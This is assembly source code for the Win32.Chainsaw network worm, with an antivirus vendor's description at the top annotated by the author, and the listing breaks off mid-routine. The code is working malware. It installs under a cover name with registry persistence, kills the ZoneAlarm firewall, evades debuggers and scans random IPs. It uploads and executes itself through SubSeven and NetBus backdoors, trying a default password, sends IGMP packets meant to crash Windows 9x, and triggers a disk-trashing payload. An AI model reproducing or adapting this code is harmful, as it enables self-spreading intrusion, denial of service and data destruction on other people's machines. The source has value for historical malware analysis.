ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CHAINSAW.ASM]ÄÄÄ
; AVP description.
; ---------------------------------------------------------------------------
; Worm.Chainsaw
;
; This is a network worm with Internet spreading ability. When the worm
; is run on a system for the first time, it installs itself. To do that it
; copies itself to the Windows system directory using the filename
; WINMINE.EXE and also to the root directory of the current drive using the
; filename CHAINSAW.EXE. The latter file then gets "hidden" attribute set.
; The worm then registers itself in the system registry, auto-run key:
;
;  HKCU\Software\Microsoft\Windows\CurrentVersion\Run
;   Mines = path\WINMINE.EXE
;
; where "path" is the Windows system directory name. The worm then exits and
; triggers its infection routines when run during the next Windows startup.
;
; During the next Windows startup the worm is automatically executed by
; Windows by an auto-run key in the system registry. The worm then registers
; itself as hidden application and runs its spreading routine. That routine
; enumerates shared drives on the local networks [* It doesn't even get near
; local shares. *], gets the Windows directory on a drive (if there is one),
; copies itself to there using the filename CHAINSAW.EXE (if the drive is
; mapped for full access) and registers itself in there by writing the "Run="
; instruction to the [windows] section of the WIN.INI file on the remote
; drive. During the next Windows restart the worm copy will be activated and
; will complete the infection.
;
; When the worm is started it sends a notifying message to the
; "alt.horror" conference. The message has the fields:
;
; From: "Leatherface" <hacked.up.for@bbq.net>
; Subject: CHAINSAWED
; Newsgroups: alt.horror
; Message body:
;
;       WHO WILL SURVIVE
;       AND WHAT WILL BE LEFT OF THEM?
;
; The worm also tries to send its copies to remote machines. To do that it
; gets randomly selected IP addresses in an endless loop and tries to connect
; to them. If it succeeds the worm tries to connect to a "Backdoor" trojan
; program on the remote machine (if the machine is infected by a backdoor
; program). After successfully connecting, the worm sends its copy to the
; remote machine and forces the Backdoor to execute it there. The list of
; "supported" Backdoors is as follows: Sub7, NetBus, NetBios. It's obvious
; that the worm has a very low chance to spread itself in such a way [*
; Several worms such as VBS/NetLog and W32/Qaz use *only* NetBios to spread,
; and are currently in the wild in large numbers, try to explain me this
; then. *]
;
; Depending on the system date the worm also sends a "Deny-of-service"
; packet to a randomly selected IP address. That packet is prepared so that
; it may cause a remote Win9x machine to crash (because of a bug in Win9x
; libraries). The worm intends to do that on the 31th of the month, but
; because of a bug compares that value with "year" field, and as a result
; will bomb random selected machines only if tje system date is set to the
; year 0031 [* Oops! Well atleast this version has it fixed :*]
;
; The worm also disables the "ZoneAlarm" Internet protection utility.
;
; Depending on its random counter the worm spawns a trojan program that
; erases data on the hard drive by writing the text to there:
;
;  "THE FILM WHICH YOU ARE ABOUT TO SEE IS AN ACCOUNT OF THE
;  TRAGEDY WHICH BEFELL A GROUP OF FIVE YOUTHS. IN PARTICULAR
;  SALLY HARDESTY AND HER INVALID BROTHER FRANKLIN. IT IS ALL
;  THE MORE TRAGIC IN THAT THEY WERE YOUNG. BUT, HAD THEY
;  LIVED VERY, VERY LONG LIVES, THEY COULD NOT HAVE EXPECTED
;  NOR WOULD THEY HAVE WISHED TO SEE AS MUCH OF THE MAD AND
;  MACABRE AS THEY WERE TO SEE THAT DAY. FOR THEM AN IDYLLIC
;  SUMMER AFTERNOON DRIVE BECAME A NIGHTMARE. THE EVENTS OF
;  THAT DAY WERE TO LEAD TO THE DISCOVERY OF ONE OF THE MOST
;  BIZARRE CRIMES IN THE ANNALS OF AMERICAN HISTORY,
;  THE TEXAS CHAIN SAW MASSACRE..."
; ---------------------------------------------------------------------------

;============================================================================
;
;
;      NAME: Win32.Chainsaw v1.01
;      TYPE: NetBios/SubSeven/NetBus worm.
;      DATE: July - September 2000.
;    AUTHOR: T-2000 / Immortal Riot.
;    E-MAIL: T2000_@hotmail.com
;   PAYLOAD: Sector trashing.
;
;  FEATURES:
;
;       - Disables ZoneAlarm firewall.
;       - Not visible in 9x tasklist.
;       - Sends usenet message on installation.
;       - DoS'es random hosts on 31st of any month.
;       - Anti-debugging code.
;
; Randomly scans the Internet for hosts running either SubSeven 2, NetBus 1,
; or NetBios, and then installs itself in the systems it can get access
; to. It's main payload is to IGMP DoS random Internet hosts on every 31st
; of the month, which will BSOD every released version of Windoze 95/98
; that isn't patched or firewalled.
;
;============================================================================

; I've kept the code clear and understandable for everyone, no optimizations
; of any kind, mainly due the file alignment, the filesize will usually just
; stay the same wether your code is optimized or not.

                .386
                .MODEL  FLAT
                .DATA

                JUMPS

; Converts a little indian word to a big indian word.
DWBI            MACRO   Lil_Indian
                DW      (Lil_Indian SHR 8) + ((Lil_Indian AND 00FFh) SHL 8)
ENDM


EXTRN           WSAGetLastError:PROC
EXTRN           ioctlsocket:PROC
EXTRN           ExitProcess:PROC
EXTRN           WSAStartup:PROC
EXTRN           WritePrivateProfileStringA:PROC
EXTRN           WSACleanup:PROC
EXTRN           socket:PROC
EXTRN           closesocket:PROC
EXTRN           setsockopt:PROC
EXTRN           InternetGetConnectedState:PROC
EXTRN           DeleteFileA:PROC
EXTRN           connect:PROC
EXTRN           setsockopt:PROC
EXTRN           PeekMessageA:PROC
EXTRN           SetFileAttributesA:PROC
EXTRN           GetSystemDirectoryA:PROC
EXTRN           CreateFileA:PROC
EXTRN           recv:PROC
EXTRN           send:PROC
EXTRN           sendto:PROC
EXTRN           CloseHandle:PROC
EXTRN           GetSystemTime:PROC
EXTRN           GetModuleHandle
EXTRN           RegOpenKeyExA:PROC
EXTRN           RegSetValueExA:PROC
EXTRN           RegCloseKey:PROC
EXTRN           ReadFile:PROC
EXTRN           CopyFileA:PROC
EXTRN           WNetAddConnection2A:PROC
EXTRN           WNetCancelConnection2A:PROC
EXTRN           SetErrorMode:PROC
EXTRN           GetModuleFileNameA:PROC
EXTRN           FindWindowA:PROC
EXTRN           PostMessageA:PROC
EXTRN           GetTickCount:PROC
EXTRN           WriteFile:PROC
EXTRN           GetLocalTime:PROC
EXTRN           WinExec:PROC
EXTRN           select:PROC
EXTRN           GetPrivateProfileStringA:PROC
EXTRN           GetModuleHandleA:PROC
EXTRN           GetProcAddress:PROC
EXTRN           WNetAddConnection2A:PROC
EXTRN           WNetEnumResourceA:PROC
EXTRN           WNetOpenEnumA:PROC
EXTRN           WNetCloseEnum:PROC
EXTRN           RegQueryValueExA:PROC
EXTRN           gethostbyname:PROC
EXTRN           inet_ntoa:PROC


Worm_Size                       EQU     6144

SEM_NOGPFAULTERRORBOX           EQU     00000002h
OPEN_EXISTING                   EQU     00000003h
CREATE_ALWAYS                   EQU     00000002h
SO_SNDTIMEO                     EQU     1005h
SO_RCVTIMEO                     EQU     1006h
RESOURCE_GLOBALNET              EQU     00000002h
RESOURCEUSAGE_CONNECTABLE       EQU     00000001h
RESOURCEUSAGE_CONTAINER         EQU     00000002h
RESOURCEUSAGE_CONNECTABLE       EQU     00000001h
RESOURCETYPE_DISK               EQU     00000001h
SOL_SOCKET                      EQU     0FFFFh
HKEY_CURRENT_USER               EQU     80000001h
KEY_QUERY_VALUE                 EQU     1
KEY_WRITE                       EQU     00020006h
REG_SZ                          EQU     00000001h
GENERIC_READ                    EQU     80000000h
GENERIC_WRITE                   EQU     40000000h
FILE_SHARE_READ                 EQU     00000001h
FILE_ATTRIBUTE_HIDDEN           EQU     2
AF_INET                         EQU     2
IPPROTO_IGMP                    EQU     2
SOCK_STREAM                     EQU     1
SOCK_RAW                        EQU     3
FIONBIO                         EQU     8004667Eh
WM_QUIT                         EQU     0012h


S7_Upload_Req   DB      'RTFChainsaw.exe'
End_S7_Upload_Req:

S7_Upload_Size  DB      'SFT046144'
End_S7_Upload_Size:

S7_Exec_Req     DB      'FMXChainsaw.exe'
End_S7_Exec_Req:

NB_Password     DB      'Password;1;netbus', 0Dh
End_NB_Password:

NB_Upload_Req   DB      'UploadFile;Chainsaw.exe;6144;\', 0Dh
End_NB_Upload_Req:

NB_Exec_File    DB      'StartApp;\Chainsaw.exe', 0Dh
End_NB_Exec_File:

Nuke_File       DB      'BBQ666.COM', 0

sz_Kernel32     DB      'KERNEL32', 0
sz_RegServProc  DB      'RegisterServiceProcess', 0

Win_Ini_Run_Key DB      'run', 0
Windows_Section DB      'windows', 0

Run_Key                 DB      'Software\Microsoft\Windows\CurrentVersion\Run', 0
ZoneAlarm_Window        DB      'ZoneAlarm', 0

Reg_Handle_1            DD      0
Reg_Handle_2            DD      0
sz_Account_Mgr          DB      'Software\Microsoft\Internet Account Manager', 0
Account_Key             DB      'Software\Microsoft\Internet Account Manager\Accounts\'
Account_Index           DB      '00000000', 0
sz_Def_News_Acc         DB      'Default News Account', 0
sz_NNTP_Server          DB      'NNTP Server', 0

Size_Acc_Buffer         DD      9
Size_NNTP_Buf           DD      128

s_POST          DB      'POST', 0Dh, 0Ah
s_QUIT          DB      'QUIT', 0Dh, 0Ah

                ; Header.

News_Message:   DB      'From: "Leatherface" <hacked.up.for@bbq.net>', 0Dh, 0Ah
                DB      'Subject: CHAINSAWED', 0Dh, 0Ah
                DB      'Newsgroups: alt.horror', 0Dh, 0Ah
                DB      0Dh, 0Ah

                ; Body.

                DB      'WHO WILL SURVIVE', 0Dh, 0Ah
                DB      'AND WHAT WILL BE LEFT OF THEM?', 0Dh, 0Ah

                ; End-of-data command.

                DB      '.', 0Dh, 0Ah
End_News_Message:

MsDos_Sys       DB      'T:\MSDOS.SYS', 0
Win_Dir_Key     DB      'WinDir', 0
Paths_Section   DB      'Paths', 0

Slash_Win_Ini   DB      '\'
Win_Ini         DB      'WIN.INI', 0

Remote_Drive    DB      'T:', 0
Cover_Name      DB      '\WINMINE.EXE', 0

Remote_Trojan   DB      'T:'
Root_Dropper    DB      '\Chainsaw.exe', 0
Run_Key_Name    DB      'Mines', 0

Boole_False     DD      0
Boole_True      DD      1

NetBios_Remote  DB      '\\666.666.666.666', 0

Time_Out:       DD      1               ; - Seconds.
                DD      500             ; - Milliseconds.

IO_Time_Out     DD      5000

Usenet_Conn:    DW      AF_INET         ; connect() structures.
                DWBI    119
Usenet_IP       DD      0
                DB      8 DUP(0)

Nuke_Conn:      DW      AF_INET
                DW      0
Nuke_IP         DD      0
                DB      8 DUP(0)

Sub7_Conn:      DW      AF_INET
                DWBI    27374
Sub7_IP         DD      0
                DB      8 DUP(0)

NetBus_Conn:    DW      AF_INET
                DWBI    12345
NetBus_IP       DD      0
                DB      8 DUP(0)

NetBus_Conn_2:  DW      AF_INET
                DWBI    (12345+1)
NetBus_IP_2     DD      0
                DB      8 DUP(0)

NetBios_Conn:   DW      AF_INET
                DWBI    139
NetBios_IP      DD      0
                DB      8 DUP(0)

Win_Dir         DB      260 DUP(0)
Default_String  DB      0

Own_Path        DB      260 DUP(0)

Net_Struc_Count DD      1
Enum_Buf_Size   DD      666
Enum_Buffer     DB      666 DUP(0)

Net_Resource_Struc:

                DD      0
                DD      0
                DD      0
                DD      0
                DD      0
                DD      OFFSET NetBios_Remote
                DD      0
                DD      0

Net_Resource:   DD      0
                DD      0
                DD      0
Net_Usage       DD      0
Net_Local_Name  DD      0
Net_Remote_Name DD      0
                DD      0
                DD      0

Select_Struc:
Sock_Count      DD      3
Sub7_Socket     DD      0
NetBus_Socket   DD      0
NetBios_Socket  DD      0

IGMP_Socket     DD      0
News_Socket     DD      0
NetBus_Socket_2 DD      0

Connect_Select: DD      4 DUP(0)

IGMP_Nuke       DB      15000 DUP(0)

Temp            DD      0
Random_Init     DD      0

Enum_Handle     DD      0

Size_Cover_Path DD      0

System_Time     DW      8 DUP(0)

Worm_Code       DB      Worm_Size DUP(0)
WSA_Data        DB      400 DUP(0)
System_Dir      DB      260 DUP(0)
NNTP_Server     DB      128 DUP(0)
Buffer          DB      512 DUP(0)

                .CODE

                DB      '[-T2IR-]', 0
START:
                PUSH    SEM_NOGPFAULTERRORBOX   ; On error just bail out
                CALL    SetErrorMode            ; without displaying shit.

                PUSH    0                       ; Fake a dispatch to get the
                PUSH    0                       ; hourglass cursor to
                PUSH    0                       ; disappear.
                PUSH    0
                PUSH    0
                CALL    PeekMessageA

                ; Get offset of CreateFileA in the jump table.

                MOV     ESI, DWORD PTR CreateFileA+2
                LODSD

                ; Soft-Ice's BPX command works with 0CCh breakpoints
                ; to hook API's, so here we simply check if a common
                ; API has been hooked and kill the system if true.
                ; For a virus it's better to check every fetched API
                ; for a debugger hook.

                CMP     BYTE PTR [ESI], 0CCh    ; Debugger has a hook on it?
                JE      Payload

                CALL    GetTickCount

                MOV     Random_Init, EAX

                PUSH    260                     ; Get the path to ourself.
                PUSH    OFFSET Own_Path
                PUSH    0
                CALL    GetModuleFileNameA

                MOV     EDI, OFFSET System_Dir

                PUSH    260                     ; Get the System directory.
                PUSH    EDI
                CALL    GetSystemDirectoryA

                MOV     ESI, OFFSET Cover_Name
                ADD     EDI, EAX

                MOVSD                           ; Append our cover name
                MOVSD                           ; \WINMINE.EXE to it.
                MOVSD
                MOVSB

                SUB     EDI, OFFSET System_Dir  ; Save size of path.
                MOV     Size_Cover_Path, EDI

                PUSH    1                       ; Copy us to the system
                PUSH    OFFSET System_Dir       ; directory under the cover
                PUSH    OFFSET Own_Path         ; name.
                CALL    CopyFileA

                XCHG    ECX, EAX                ; Virus is already installed?
                JECXZ   Check_Trigger

                PUSH    1                       ; Copy root dropper to root
                PUSH    OFFSET Root_Dropper     ; to indicate this is the 1st
                PUSH    OFFSET Own_Path         ; run of the worm.
                CALL    CopyFileA

                PUSH    FILE_ATTRIBUTE_HIDDEN   ; Hide it.
                PUSH    OFFSET Root_Dropper
                CALL    SetFileAttributesA

                PUSH    OFFSET Reg_Handle_1     ; Open up a handle to the
                PUSH    KEY_WRITE               ; registry Run key.
                PUSH    0
                PUSH    OFFSET Run_Key
                PUSH    HKEY_CURRENT_USER
                CALL    RegOpenKeyExA

                PUSH    Size_Cover_Path         ; Make the cover file run
                PUSH    OFFSET System_Dir       ; every bootup.
                PUSH    REG_SZ
                PUSH    0
                PUSH    OFFSET Run_Key_Name
                PUSH    Reg_Handle_1
                CALL    RegSetValueExA

                PUSH    Reg_Handle_1            ; Close registry key.
                CALL    RegCloseKey

                PUSH    OFFSET Win_Ini          ; Remove temporary reference
                PUSH    0                       ; to virus dropper in
                PUSH    OFFSET Win_Ini_Run_Key  ; WIN.INI.
                PUSH    OFFSET Windows_Section
                CALL    WritePrivateProfileStringA

Exit:           PUSH    0
                CALL    ExitProcess

Check_Trigger:  MOV     EAX, 666                ; 1/666 chance of activating.
                CALL    Random_EAX

                DEC     EAX                     ; Today is trashday?
                JZ      Payload

                PUSH    0                       ; Open ourselves.
                PUSH    0
                PUSH    OPEN_EXISTING
                PUSH    0
                PUSH    FILE_SHARE_READ
                PUSH    GENERIC_READ
                PUSH    OFFSET Own_Path
                CALL    CreateFileA

                MOV     EBX, EAX

                INC     EAX
                JZ      Exit

                PUSH    0                       ; Read in ourselves.
                PUSH    OFFSET Temp
                PUSH    Worm_Size+1
                PUSH    OFFSET Worm_Code
                PUSH    EBX
                CALL    ReadFile

                CMP     Temp, Worm_Size         ; Wormsize has changed?
                JNE     Payload                 ; Then we're likely
                                                ; incomplete or infected
                                                ; with a virus.

                PUSH    EBX                     ; Close ourselves again.
                CALL    CloseHandle

                PUSH    OFFSET sz_Kernel32      ; Get base of KERNEL32.DLL.
                CALL    GetModuleHandleA

                PUSH    OFFSET sz_RegServProc   ; Get RegisterServiceProcess.
                PUSH    EAX
                CALL    GetProcAddress

                XCHG    ECX, EAX
                JECXZ   Init_Winsock

                PUSH    1                       ; Register our process as a
                PUSH    0                       ; hidden service.
                CALL    ECX

Init_Winsock:   PUSH    OFFSET WSA_Data         ; Initialize winsock.
                PUSH    0202h
                CALL    WSAStartup

                OR      EAX, EAX                ; Error?
                JNZ     Exit

Chk_Inet_State: PUSH    0                       ; We're connected to the
                PUSH    OFFSET Temp             ; Internet?
                CALL    InternetGetConnectedState

                DEC     EAX                     ; Else just loop and check
                JNZ     Chk_Inet_State          ; again until we are.

                ; Here we close the ZoneAlarm firewall if it is
                ; found active, reason being that A) it will pop-up
                ; a warning box whenever a program (ie. our worm)
                ; is attempting to access the Internet, (this is how
                ; many RAT trojans get caught these days) and B) it
                ; is likely to block our ports.

                PUSH    OFFSET ZoneAlarm_Window ; Attempt to locate the
                PUSH    0                       ; ZoneAlarm window.
                CALL    FindWindowA

                XCHG    ECX, EAX
                JECXZ   Check_1st_Run

                PUSH    0                       ; Tell ZoneAlarm to quit.
                PUSH    0
                PUSH    WM_QUIT
                PUSH    ECX
                CALL    PostMessageA

Check_1st_Run:  PUSH    OFFSET Root_Dropper     ; Can we delete the root
                CALL    DeleteFileA             ; dropper?

                XCHG    ECX, EAX
                JECXZ   Do_Random_IP

                ; This is the first Internet run of the worm, so
                ; send a usenet message to alt.horror to note
                ; our presence. Better to just use a public
                ; dump place instead of e-mail for example, this
                ; way they can't track you or kill the account.

                PUSH    OFFSET Reg_Handle_1     ; Open a handle to Internet
                PUSH    KEY_QUERY_VALUE         ; Account Manager.
                PUSH    0
                PUSH    OFFSET sz_Account_Mgr
                PUSH    HKEY_CURRENT_USER
                CALL    RegOpenKeyExA

                OR      EAX, EAX
                JNZ     Do_Random_IP

                PUSH    OFFSET Size_Acc_Buffer  ; Get default news account.
                PUSH    OFFSET Account_Index
                PUSH    0
                PUSH    0
                PUSH    OFFSET sz_Def_News_Acc
                PUSH    Reg_Handle_1
                CALL    RegQueryValueExA

                OR      EAX, EAX
                JNZ     Close_Reg_1

                PUSH    OFFSET Reg_Handle_2     ; Open the default news
                PUSH    KEY_QUERY_VALUE         ; account.
                PUSH    0
                PUSH    OFFSET Account_Key
                PUSH    HKEY_CURRENT_USER
                CALL    RegOpenKeyExA

                OR      EAX, EAX
                JNZ     Close_Reg_1

                PUSH    OFFSET Size_NNTP_Buf    ; Get it's NNTP server.
                PUSH    OFFSET NNTP_Server
                PUSH    0
                PUSH    0
                PUSH    OFFSET sz_NNTP_Server
                PUSH    Reg_Handle_2
                CALL    RegQueryValueExA

                OR      EAX, EAX
                JNZ     Close_Reg_2

                PUSH    OFFSET NNTP_Server      ; Convert the DNS-name to
                CALL    gethostbyname           ; an IP-address.

                XCHG    ECX, EAX
                JECXZ   Close_Reg_2

                MOV     ESI, [ECX+12]           ; Fetch IP-address.
                LODSD
                PUSH    DWORD PTR [EAX]
                POP     Usenet_IP

                PUSH    0
                PUSH    SOCK_STREAM
                PUSH    AF_INET
                CALL    socket

                MOV     News_Socket, EAX

                INC     EAX                     ; Error?
                JZ      Close_Reg_2

                MOV     EBX, News_Socket
                CALL    Set_Time_Outs

                PUSH    16
                PUSH    OFFSET Usenet_Conn
                PUSH    News_Socket
                CALL    connect

                INC     EAX
                JZ      Close_Reg_2

                MOV     EDI, OFFSET Buffer

                PUSH    0                       ; Receive data from the
                PUSH    512                     ; socket.
                PUSH    EDI
                PUSH    News_Socket
                CALL    recv

                INC     EAX
                JZ      Close_News

                CMP     BYTE PTR [EDI], '2'
                JNE     Send_QUIT

                PUSH    0
                PUSH    6
                PUSH    OFFSET s_POST
                PUSH    News_Socket
                CALL    send

                INC     EAX
                JZ      Close_News

                PUSH    0                       ; Receive data from the
                PUSH    512                     ; socket.
                PUSH    EDI
                PUSH    News_Socket
                CALL    recv

                INC     EAX
                JZ      Close_News

                CMP     BYTE PTR [EDI], '3'
                JNE     Send_QUIT

                PUSH    0
                PUSH    (End_News_Message-News_Message)
                PUSH    OFFSET News_Message
                PUSH    News_Socket
                CALL    send

                INC     EAX
                JZ      Close_News

                PUSH    0                       ; Receive data from the
                PUSH    512                     ; socket.
                PUSH    EDI
                PUSH    News_Socket
                CALL    recv

                INC     EAX
                JZ      Close_News

Send_QUIT:      PUSH    0
                PUSH    6
                PUSH    OFFSET s_QUIT
                PUSH    News_Socket
                CALL    send

                INC     EAX
                JZ      Close_News

                PUSH    0                       ; Receive data from the
                PUSH    512                     ; socket.
                PUSH    EDI
                PUSH    News_Socket
                CALL    recv

Close_News:     PUSH    News_Socket
                CALL    closesocket

Close_Reg_2:    PUSH    Reg_Handle_2
                CALL    RegCloseKey

Close_Reg_1:    PUSH    Reg_Handle_1
                CALL    RegCloseKey

Do_Random_IP:   CALL    Random_AL_254           ; Get random octet (1-254).

                XCHG    EBX, EAX

                CALL    Random_AL_254           ; Another one.

                SHL     EBX, 8
                MOV     BL, AL

                CALL    Random_AL_254           ; And another one.

                SHL     EBX, 8
                MOV     BL, AL

Rand_A_Class:   MOV     AL, 223                 ; Random A/B/C class IP.
                CALL    Random_AL

                CMP     AL, 10                  ; Private network segment.
                JE      Rand_A_Class

                CMP     AL, 127                 ; Localhost network.
                JE      Rand_A_Class

                SHL     EBX, 8
                MOV     BL, AL

                MOV     Nuke_IP, EBX
                MOV     Sub7_IP, EBX            ; Store the random IP in our
                MOV     NetBus_IP, EBX          ; structures.
                MOV     NetBus_IP_2, EBX
                MOV     NetBios_IP, EBX

                PUSH    OFFSET System_Time      ; Get system date.
                CALL    GetSystemTime

                CMP     System_Time+(3*2), 31   ; Is today nuke day?
                JNE     IP_To_ASCIIZ

                PUSH    IPPROTO_IGMP            ; Create a raw IGMP socket.
                PUSH    SOCK_RAW
                PUSH    AF_INET
                CALL    socket

                MOV     IGMP_Socket, EAX

                INC     EAX
                JZ      Do_Random_IP

                MOV     EDI, 10                 ; Send 10 nuke packets.

        ; Windows 95/98 has problems with handling fragmented IGMP
        ; packets, when processing a whole bunch of these the system
        ; will usually BSOD. Here we simply send a large packet (the
        ; packet will arrive regardless of content it seems), which
        ; will automatically be fragmented by the underlying TCP/IP
        ; layers. Officially IGMP packets aren't supposed to leave
        ; the current subnet, so if your ISP uses filtering (mainly
        ; cable/ADSL connections), this nuke won't get through,
        ; however SLIP/PPP connections (mainly dialups), seem to have
        ; no problems delivering it.

Send_Nuke:      PUSH    16                      ; Send the nuke.
                PUSH    OFFSET Nuke_Conn
                PUSH    0
                PUSH    15000
                PUSH    OFFSET IGMP_Nuke
                PUSH    IGMP_Socket
                CALL    sendto

                DEC     EDI                     ; Send all 10 packets.
                JNZ     Send_Nuke

Exit_Nuke:      PUSH    IGMP_Socket
                CALL    closesocket

                JMP     Do_Random_IP

IP_To_ASCIIZ:   PUSH    EBX                     ; Convert DWORD to ASCIIZ
                CALL    inet_ntoa               ; for the NetBios API's.

                XCHG    ESI, EAX
                MOV     EDI, OFFSET NetBios_Remote+2

                ; Copy the ASCIIZ IP to our own buffer.

Copy_ASCIIZ_IP: LODSB
                STOSB

                OR      AL, AL                  ; Did entire ASCIIZ string?
                JNZ     Copy_ASCIIZ_IP

                PUSH    0                       ; Create sockets.
                PUSH    SOCK_STREAM
                PUSH    AF_INET
                CALL    socket

                MOV     Sub7_Socket, EAX

                INC     EAX
                JZ      Chk_Inet_State

                PUSH    0
                PUSH    SOCK_STREAM
                PUSH    AF_INET
                CALL    socket

                MOV     NetBus_Socket, EAX

                INC     EAX
                JZ      Close_Sub7

                PUSH    0
                PUSH    SOCK_STREAM
                PUSH    AF_INET
                CALL    socket

                MOV     NetBios_Socket, EAX

                INC     EAX
                JZ      Close_NetBus

        ; The standard connect() timeout interval is like 100 seconds
        ; or so, obviously this is way to long for portscanning, so we
        ; need to set our own timeout interval. Unfortunately Winsock
        ; does not have any API that can set a connect() timeout interval
        ; (neither does BSD Sockets btw). Kind of stupid, but anyways,
        ; here we realize our own timeout function by first switching
        ; the connect() sockets to non-blocking mode, and then running
        ; select() on em with a 1500ms timeout to see if they are connected.

                PUSH    OFFSET Boole_True       ; Set socket to non-blocking
                PUSH    FIONBIO                 ; mode.
                PUSH    Sub7_Socket
                CALL    ioctlsocket

                PUSH    OFFSET Boole_True
                PUSH    FIONBIO
                PUSH    NetBus_Socket
                CALL    ioctlsocket

                PUSH    OFFSET Boole_True
                PUSH    FIONBIO
                PUSH    NetBios_Socket
                CALL    ioctlsocket

                PUSH    16                      ; Connect SubSeven port.
                PUSH    OFFSET Sub7_Conn
                PUSH    Sub7_Socket
                CALL    connect

                PUSH    16                      ; Connect NetBus port.
                PUSH    OFFSET NetBus_Conn
                PUSH    NetBus_Socket
                CALL    connect

                PUSH    16                      ; Connect NetBios port.
                PUSH    OFFSET NetBios_Conn     ; (only to quickly probe the
                PUSH    NetBios_Socket          ; host for NetBios).
                CALL    connect

                MOV     ESI, OFFSET Select_Struc
                MOV     EDI, OFFSET Connect_Select

                MOVSD
                MOVSD
                MOVSD
                MOVSD

                PUSH    OFFSET Time_Out         ; Check if any sockets are
                PUSH    0                       ; writeable (connected)
                PUSH    OFFSET Connect_Select   ; within 1500ms.
                PUSH    0
                PUSH    0
                CALL    select

                INC     EAX                     ; Error?
                JZ      Close_NetBios

                DEC     EAX                     ; Zero sockets connected?
                JZ      Close_NetBios

                PUSH    OFFSET Boole_False      ; Switch sockets back to
                PUSH    FIONBIO                 ; blocking mode.
                PUSH    Sub7_Socket
                CALL    ioctlsocket

                PUSH    OFFSET Boole_False
                PUSH    FIONBIO
                PUSH    NetBus_Socket
                CALL    ioctlsocket

                MOV     EBX, Sub7_Socket        ; Set send/recv timeout on
                CALL    Set_Time_Outs           ; sockets to prevent endless
                                                ; blocking.
                MOV     EBX, NetBus_Socket
                CALL    Set_Time_Outs

                MOV     EDI, OFFSET Buffer      ; recv-buffer.

Try_Sub7:       PUSH    0                       ; Attempt to get SubSeven
                PUSH    512                     ; connection reply.
                PUSH    EDI
                PUSH    Sub7_Socket
                CALL    recv

                INC     EAX                     ; Not connected?
                JZ      Try_NetBus

                ; If it's a SubSeven server, and not password
                ; protected, it should reply with 'connected',
                ; and the time/date and version.

                CMP     [EDI], 'nnoc'           ; If we can't access the Sub7
                JNE     Try_NetBus              ; server, move on to NetBus.

                ; First request a file upload by sending
                ; 'RTF' with the upload path connected to
                ; it: 'RTFChainsaw.exe'.

                PUSH    0
                PUSH    (End_S7_Upload_Req-S7_Upload_Req)
                PUSH    OFFSET S7_Upload_Req
                PUSH    Sub7_Socket
                CALL    send

                INC     EAX
                JZ      Try_NetBus

                PUSH    0                       ; Fetch the reply, it should
                PUSH    512                     ; be 'TID' if all is OK.
                PUSH    EDI
                PUSH    Sub7_Socket
                CALL    recv

                INC     EAX
                JZ      Try_NetBus

                CMP     [EDI], 'nDIT'           ; Check for 'TID' (plus last
                JNE     Try_NetBus              ; byte of previous recv).

                ; First let the server know the filesize of the
                ; upload, this is done by sending a 'SFT' + the
                ; length of the filesize (represented by two
                ; numbers) + the actual filesize: 'SFT046144'.

                PUSH    0
                PUSH    (End_S7_Upload_Size-S7_Upload_Size)
                PUSH    OFFSET S7_Upload_Size
                PUSH    Sub7_Socket
                CALL    send

                INC     EAX
                JZ      Try_NetBus

                PUSH    0                       ; Then send the actual file
                PUSH    Worm_Size               ; contents.
                PUSH    OFFSET Worm_Code
                PUSH    Sub7_Socket
                CALL    send

                INC     EAX
                JZ      Try_NetBus

        ; SubSeven works with a 1041-byte receive buffer, every
        ; 1041 or less bytes received will be acknowledged with
        ; a 'p:' + the total amount of bytes received + '.'.

Retrieve_Ack:   PUSH    0                       ; Receive a 7-byte 'p:xxxx.'
                PUSH    7                       ; (don't read more than 7
                PUSH    EDI                     ; bytes as often the data is
                PUSH    Sub7_Socket             ; overlapping).
                CALL    recv

                INC     EAX
                JZ      Try_NetBus

                CMP     [EDI+2], '4416'         ; Last acknowledgement?
                JNE     Retrieve_Ack            ; Otherwise just go on.

        ; Check upload reply, which should be 'file successfully uploaded.'
        ; if all went fine, (however it seems to return this regardless of
        ; success or failure..).

Check_UL_Reply: PUSH    0
                PUSH    512
                PUSH    EDI
                PUSH    Sub7_Socket
                CALL    recv

                INC     EAX
                JZ      Try_NetBus

                CMP     [EDI+5], 'ccus'         ; Check for 'success'.
                JNE     Try_NetBus              ; Bail on error.

        ; Now remotely execute the uploaded worm copy by sending a
        ; 'FMX' + the path of the file to execute: 'FMXChainsaw.exe'.
        ; SubSeven uses ShellExecuteA to run files, so it is capable
        ; of opening any registered file extension such as .VBS etc.

                PUSH    0
                PUSH    (End_S7_Exec_Req-S7_Exec_Req)
                PUSH    OFFSET S7_Exec_Req
                PUSH    Sub7_Socket
                CALL    send

                INC     EAX
                JZ      Try_NetBus

                PUSH    0                       ; Fetch the command reply,
                PUSH    512                     ; which should be
                PUSH    EDI                     ; 'file has been executed.'.
                PUSH    Sub7_Socket
                CALL    recv

Try_NetBus:     PUSH    0                       ; Fetch connection reply.
                PUSH    512
                PUSH    EDI
                PUSH    NetBus_Socket
                CALL    recv

                INC     EAX
                JZ      Try_NetBios

                ; NetBus servers respond with 'NetBus', and
                ; the version, and if the server is password
                ; protected also with an 'x'.

                CMP     [EDI], 'BteN'           ; Is it an actual NetBus
                JNE     Try_NetBios             ; server?

                ; Server is password protected?

                CMP     BYTE PTR [EDI+EAX-3], 'x'
                JNE     Upload_Worm

                ; Now try one password, 'netbus' (should be commonly used
                ; I guess), together with a NetBus 1.60- backdoor function
                ; that accepts any password.

                PUSH    0
                PUSH    (End_NB_Password-NB_Password)
                PUSH    OFFSET NB_Password
                PUSH    NetBus_Socket
                CALL    send

                INC     EAX
                JZ      Try_NetBios

                PUSH    0                       ; Get password reply.
                PUSH    512
                PUSH    EDI
                PUSH    NetBus_Socket
                CALL    recv

                INC     EAX
                JZ      Try_NetBios

                ; If the password got accepted then it
                ; should return 'Access;1'.

                CMP     [EDI+4], '1;ss'         ; 'Access;1' ?
                JNE     Try_NetBios

                ; Request a file upload by sending 'UploadFile;'
                ; + filename + ';' + filesize + ';' + upload path:
                ; 'UploadFile;Chainsaw.exe;6144;\'.

Upload_Worm:    PUSH    0
                PUSH    (End_NB_Upload_Req-NB_Upload_Req)
                PUSH    OFFSET NB_Upload_Req
                PUSH    NetBus_Socket
                CALL    send

                INC     EAX
                JZ      Try_NetBios

